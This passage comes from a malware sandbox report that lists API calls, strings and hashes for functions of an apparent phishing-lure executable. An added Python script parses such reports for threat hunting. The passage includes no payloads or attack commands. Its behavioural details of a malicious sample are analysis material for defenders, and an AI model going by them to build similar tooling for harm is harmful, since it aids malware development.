                                                      • API String ID: 1324828854-0
                                                      APIs
                                                        • Part of subcall function 0030304E: inet_addr.WSOCK32(?), ref: 0030307A
                                                        • Part of subcall function 0030304E: _wcslen.LIBCMT ref: 0030309B
                                                      • socket.WSOCK32(00000002,00000001,00000006), ref: 00301112
                                                      • WSAGetLastError.WSOCK32 ref: 00301121
                                                      • WSAGetLastError.WSOCK32 ref: 003011C9
                                                      • closesocket.WSOCK32(00000000), ref: 003011F9
                                                      Similarity
                                                      • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 2675159561-0
                                                      APIs
                                                        • Part of subcall function 002EDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002ECF22,?), ref: 002EDDFD
                                                        • Part of subcall function 002EDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002ECF22,?), ref: 002EDE16
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 002ECF45
                                                      • MoveFileW.KERNEL32(?,?), ref: 002ECF7F
                                                      • _wcslen.LIBCMT ref: 002ED005
                                                      • _wcslen.LIBCMT ref: 002ED01B
                                                      • SHFileOperationW.SHELL32(?), ref: 002ED061
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                      • String ID: \*.*
                                                      • API String ID: 3164238972-1173974218
                                                      • Opcode ID: 3442d18549cb7017a3fe613eabaf26191857246bcfc1662557c5ec2a6eddd671
                                                      • Instruction ID: fecbbc416c90b0525303f2688b1b1962c528f147d4ec4402b82db41484584262
                                                      • Opcode Fuzzy Hash: 3442d18549cb7017a3fe613eabaf26191857246bcfc1662557c5ec2a6eddd671
                                                      • Instruction Fuzzy Hash: CA4176718952595FDF12EFA5C981ADEB7B8AF08380F5000E6E505EB142EE34AA95CF50
                                                      APIs
                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00312E1C
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00312E4F
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00312E84
                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00312EB6
                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00312EE0
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00312EF1
                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00312F0B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$MessageSend
                                                      • String ID:
                                                      • API String ID: 2178440468-0
                                                      • Opcode ID: cbb485db24f260205f8bb258080aca9be8d9523124972724a864c506fedc8579
                                                      • Instruction ID: 077be94a662777278756397c7b89d6f4e1da7bc9cea39d52b68b34bfec132e2e
                                                      • Opcode Fuzzy Hash: cbb485db24f260205f8bb258080aca9be8d9523124972724a864c506fedc8579
                                                      • Instruction Fuzzy Hash: 1C311330644250AFDB26CF18DC84FA677E9EB8E711F1A5164F9108F2B1CB71ACA0DB60
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002E7769
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002E778F
                                                      • SysAllocString.OLEAUT32(00000000), ref: 002E7792
                                                      • SysAllocString.OLEAUT32(?), ref: 002E77B0
                                                      • SysFreeString.OLEAUT32(?), ref: 002E77B9
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 002E77DE
                                                      • SysAllocString.OLEAUT32(?), ref: 002E77EC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: c9c3b625e8a0607d6291eca940803866614a14101991e07281e7b14e5716abeb
                                                      • Instruction ID: 42d92b2e9f45a555baebabe2cc67d1753897782f75afaef13c20247a9f6b8bf3
                                                      • Opcode Fuzzy Hash: c9c3b625e8a0607d6291eca940803866614a14101991e07281e7b14e5716abeb
                                                      • Instruction Fuzzy Hash: D921B676668219AFDF11DFAACC88CFBB7ACEB09764B448025F915DB150D670DC418B60
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002E7842
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002E7868
                                                      • SysAllocString.OLEAUT32(00000000), ref: 002E786B
                                                      • SysAllocString.OLEAUT32 ref: 002E788C
                                                      • SysFreeString.OLEAUT32 ref: 002E7895
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 002E78AF
                                                      • SysAllocString.OLEAUT32(?), ref: 002E78BD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: 49910b6929485f94d9b4dc2e48c539790ebbf7bc8f76543a0763faba924346b7
                                                      • Instruction ID: 48581ba02efcaaef387648e4636a527381515de66ecbb73dad3f48f0cbd7a173
                                                      • Opcode Fuzzy Hash: 49910b6929485f94d9b4dc2e48c539790ebbf7bc8f76543a0763faba924346b7
                                                      • Instruction Fuzzy Hash: 8521C131668215AFDF11DFA9CC8CDEA77ECEB18360B508025F914CB2A0DA70DC41DB64
                                                      APIs
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 002F04F2
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002F052E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CreateHandlePipe
                                                      • String ID: nul
                                                      • API String ID: 1424370930-2873401336
                                                      • Opcode ID: 1dbc5ef5de9bfb74bdb7355cdcd2427c01b0d2f6f595f12b2b55d439538b4f00
                                                      • Instruction ID: e22bf3efd8551523a37b4789d7b69c5f7f7297ef471b7542a530cbe3bfdc09f6
                                                      • Opcode Fuzzy Hash: 1dbc5ef5de9bfb74bdb7355cdcd2427c01b0d2f6f595f12b2b55d439538b4f00
                                                      • Instruction Fuzzy Hash: 6E21857591030A9BDF204F29DC84AA9B7A4BF447A4F604A29F9A1D71D1D7B0D960CF20
                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 002F05C6
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002F0601
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CreateHandlePipe
                                                      • String ID: nul
                                                      • API String ID: 1424370930-2873401336
                                                      • Opcode ID: 1093abbc15616d57253a9ca0e526feb4cc1c06bd11b1ed8c00744be6d09aa60b
                                                      • Instruction ID: f81145e15bd277309b43202e30a51cca59a070afa582e1e8e1ff95a683567aa3
                                                      • Opcode Fuzzy Hash: 1093abbc15616d57253a9ca0e526feb4cc1c06bd11b1ed8c00744be6d09aa60b
                                                      • Instruction Fuzzy Hash: 5A21A87551031E9BDB204F68CC84AAAB7ECBF85760F204A29F9A1D72D1D7B09870CB10
                                                      APIs
                                                        • Part of subcall function 0028600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0028604C
                                                        • Part of subcall function 0028600E: GetStockObject.GDI32(00000011), ref: 00286060
                                                        • Part of subcall function 0028600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0028606A
                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00314112
                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0031411F
                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0031412A
                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00314139
                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00314145
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                      • String ID: Msctls_Progress32
                                                      • API String ID: 1025951953-3636473452
                                                      • Opcode ID: 6b73ec3e4b42f34b0213429384f48c11a8b280ee7073421843412b53b0205135
                                                      • Instruction ID: 2013c0dc55e2f9285d9521f14cfc82f960029680267ff9ff9583e73278c9f694
                                                      • Opcode Fuzzy Hash: 6b73ec3e4b42f34b0213429384f48c11a8b280ee7073421843412b53b0205135
                                                      • Instruction Fuzzy Hash: 6611B2B2150219BEEF129F64CC85EE77F9DEF0D798F014120FA18A6190C7729C61DBA4
                                                      APIs
                                                        • Part of subcall function 002BD7A3: _free.LIBCMT ref: 002BD7CC
                                                      • _free.LIBCMT ref: 002BD82D
                                                        • Part of subcall function 002B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,002BD7D1,00000000,00000000,00000000,00000000,?,002BD7F8,00000000,00000007,00000000,?,002BDBF5,00000000), ref: 002B29DE
                                                        • Part of subcall function 002B29C8: GetLastError.KERNEL32(00000000,?,002BD7D1,00000000,00000000,00000000,00000000,?,002BD7F8,00000000,00000007,00000000,?,002BDBF5,00000000,00000000), ref: 002B29F0
                                                      • _free.LIBCMT ref: 002BD838
                                                      • _free.LIBCMT ref: 002BD843
                                                      • _free.LIBCMT ref: 002BD897
                                                      • _free.LIBCMT ref: 002BD8A2
                                                      • _free.LIBCMT ref: 002BD8AD
                                                      • _free.LIBCMT ref: 002BD8B8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                      • Instruction ID: c3f3479b8056449e6cd38e08fe0bd7ece970f76970168adaf15c2db6cb9b24b6
                                                      • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                      • Instruction Fuzzy Hash: E4110D71561F04FBD521BFB0CC47FCBBBDC6F04780F404C25B2ADA6492EA65B5255A50
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 002EDA74
                                                      • LoadStringW.USER32(00000000), ref: 002EDA7B
                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 002EDA91
                                                      • LoadStringW.USER32(00000000), ref: 002EDA98
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002EDADC
                                                      Strings
                                                      • %s (%d) : ==> %s: %s %s, xrefs: 002EDAB9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString$Message
                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                      • API String ID: 4072794657-3128320259
                                                      • Opcode ID: 64c0461214163b3824e70ecd180b0eaac2a083394734f1f02c11480f0f959342
                                                      • Instruction ID: 1d23cdb1d2125850ee15ae9f8e0b8d6fae9a5543db4c11b0eb71be4c416ca430
                                                      • Opcode Fuzzy Hash: 64c0461214163b3824e70ecd180b0eaac2a083394734f1f02c11480f0f959342
                                                      • Instruction Fuzzy Hash: 8A0186F65902087FE712DBA49D89EE7336CE70C301F4054A6F746E6041E6749E844F74
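The per-function blocks above (APIs, Strings, Similarity, Opcode ID and fuzzy hashes) are easier to hunt with once parsed into records. The following Python is an added example and is not part of the Joe Sandbox report or its IDA plugin: it parses the block format exactly as it is rendered on this page (the grammar is inferred from the visible text, not from Joe Sandbox documentation, so treat it as an assumption), distinguishes a function's own call sites from lines the report attributes to a subcall, and pivots from an API name such as CreatePipe to the Opcode IDs of the functions that call it, which is the value you would then search for in other reports. The sample input is constructed from the CreatePipe, MoveFileW and MessageBoxW blocks above, trimmed to the fields the parser reads; the class, function and field names are the example's own.

```python
"""Parse the per-function 'APIs / Strings / Similarity' blocks that Joe Sandbox's
IDA plugin emits, and pivot from an API name to the function fingerprints that
call it.  Added example, not part of the report.  The grammar is inferred from
the visible report text (an assumption, not documented format); the sample at
the bottom is constructed from three blocks on this page."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Three call-line shapes appear in the report:
#   "• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002F052E"
#   "  • Part of subcall function 002EDDE0: GetFullPathNameW.KERNEL32(...), ref: 002EDDFD"
#   "• _wcslen.LIBCMT ref: 002ED005"      (no argument list, no comma before ref)
_CALL_RE = re.compile(r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
                      r"(?P<callee>.+?),? ref: (?P<ref>[0-9A-Fa-f]+)$")
_KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
_SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")

@dataclass
class ApiCall:
    api: str
    module: str
    args: Optional[list]               # None when the report prints no argument list
    ref: str                           # call-site address as printed
    subcall_of: Optional[str] = None   # function address for "Part of subcall" lines

@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)   # (string, xref) pairs
    meta: dict = field(default_factory=dict)      # Similarity / dump-source key-values

def parse_call(line):
    m = _CALL_RE.match(line.strip())
    if not m:
        return None
    callee, args = m.group("callee"), None
    if callee.endswith(")"):
        callee, _, inner = callee[:-1].partition("(")
        args = inner.split(",") if inner else []
    api, _, module = callee.rpartition(".")   # CRT names such as ??2@...@@@Z keep their '@' and '$'
    return ApiCall(api, module, args, m.group("ref").upper(), m.group("sub"))

def parse_report(text):
    blocks, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in _SECTIONS:
            if line == "APIs":            # every function block opens with its API list
                cur = FunctionBlock()
                blocks.append(cur)
            section = line
            continue
        if cur is None or not line.startswith("•"):
            continue
        if section == "APIs":
            call = parse_call(line)
            if call:
                cur.calls.append(call)
        elif section == "Strings":
            s, sep, xref = line[1:].strip().rpartition(", xrefs: ")
            cur.strings.append((s, xref) if sep else (xref, None))
        else:
            m = _KV_RE.match(line)
            if not m:
                continue
            key = m.group("key").strip()
            # Copied reports often carry the "Download File" link text fused onto dump lines.
            val = m.group("val").removesuffix("Download File").strip()
            if key == "Associated":
                cur.meta.setdefault(key, []).append(val)
            else:
                cur.meta[key] = val
    return blocks

def blocks_calling(blocks, api, direct_only=True):
    """Opcode IDs of every block that calls `api`.  By default lines the report
    attributes to a subcall are ignored, so the pivot lands on the function that
    actually contains the call site."""
    return [b.meta.get("Opcode ID") for b in blocks
            if any(c.api == api and (c.subcall_of is None or not direct_only) for c in b.calls)]

# Constructed sample: three blocks copied from this report, trimmed to the fields parsed above.
SAMPLE = """\
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 002F04F2
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002F052E
Strings
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
• Opcode ID: 1dbc5ef5de9bfb74bdb7355cdcd2427c01b0d2f6f595f12b2b55d439538b4f00
APIs
  • Part of subcall function 002EDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002ECF22,?), ref: 002EDDFD
• lstrcmpiW.KERNEL32(?,?), ref: 002ECF45
• MoveFileW.KERNEL32(?,?), ref: 002ECF7F
• _wcslen.LIBCMT ref: 002ED005
• SHFileOperationW.SHELL32(?), ref: 002ED061
Similarity
• API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
• String ID: \\*.*
• Opcode ID: 3442d18549cb7017a3fe613eabaf26191857246bcfc1662557c5ec2a6eddd671
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 002EDA74
• LoadStringW.USER32(00000000), ref: 002EDA7B
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 002EDADC
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 002EDAB9
Similarity
• API ID: HandleLoadModuleString$Message
• Opcode ID: 64c0461214163b3824e70ecd180b0eaac2a083394734f1f02c11480f0f959342
"""

if __name__ == "__main__":
    parsed = parse_report(SAMPLE)
    for b in parsed:
        print(b.meta.get("API ID"), [(c.api, c.subcall_of) for c in b.calls])
    print("CreatePipe callers:", blocks_calling(parsed, "CreatePipe"))
```

Run it on the full text of a report page (copied as plain text) and `blocks_calling` becomes a quick way to answer "which function fingerprint owns this API" without scrolling; the `direct_only` switch matters because the report lists subcall APIs under the caller, so a naive grep for GetFullPathNameW would attribute it to the MoveFileW block rather than to function 002EDDE0.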
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(00D2D3E8,00D2D3E8), ref: 002F097B
                                                      • EnterCriticalSection.KERNEL32(00D2D3C8,00000000), ref: 002F098D
                                                      • TerminateThread.KERNEL32(00000000,000001F6), ref: 002F099B
                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 002F09A9
                                                      • CloseHandle.KERNEL32(00000000), ref: 002F09B8
                                                      • InterlockedExchange.KERNEL32(00D2D3E8,000001F6), ref: 002F09C8
                                                      • LeaveCriticalSection.KERNEL32(00D2D3C8), ref: 002F09CF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                      • String ID:
                                                      • API String ID: 3495660284-0
                                                      • Opcode ID: 54a7156a3423b852e63191d8702d7237ff788c8b8a589d66259b427986b31727
                                                      • Instruction ID: 375047b79cb7f078f131039387d06c60ef6ec5747e0b680d8de0a87c79d0117e
                                                      • Opcode Fuzzy Hash: 54a7156a3423b852e63191d8702d7237ff788c8b8a589d66259b427986b31727
                                                      • Instruction Fuzzy Hash: CBF03131492612FBDB525F94EE8CBE6BB39FF09742F406425F202508A1D774A476CF90
                                                      APIs
                                                      • __allrem.LIBCMT ref: 002B00BA
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002B00D6
                                                      • __allrem.LIBCMT ref: 002B00ED
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002B010B
                                                      • __allrem.LIBCMT ref: 002B0122
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002B0140
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                      • String ID:
                                                      • API String ID: 1992179935-0
                                                      • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                      • Instruction ID: bfe3900a58a73756df6180d1e7cbd285a7d6b46ab067da21e92a2a04a92e54ed
                                                      • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                      • Instruction Fuzzy Hash: B5811D71A207069FE725AF68CC81BAB73E89F423A4F24453DF415D76D1EBB4D9208B50
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,002A82D9,002A82D9,?,?,?,002B644F,00000001,00000001,8BE85006), ref: 002B6258
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,002B644F,00000001,00000001,8BE85006,?,?,?), ref: 002B62DE
                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 002B63D8
                                                      • __freea.LIBCMT ref: 002B63E5
                                                        • Part of subcall function 002B3820: RtlAllocateHeap.NTDLL(00000000,?,00351444,?,0029FDF5,?,?,0028A976,00000010,00351440,002813FC,?,002813C6,?,00281129), ref: 002B3852
                                                      • __freea.LIBCMT ref: 002B63EE
                                                      • __freea.LIBCMT ref: 002B6413
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1414292761-0
                                                      • Opcode ID: 43d2c8f0909bc2fea7355d60be483dffc446192d0f0d5cf2b03aaac85288813e
                                                      • Instruction ID: ed289e41bb62eca4f8dbaa1f0065dc1f54bfa051a433442d871d8ac016c1fb20
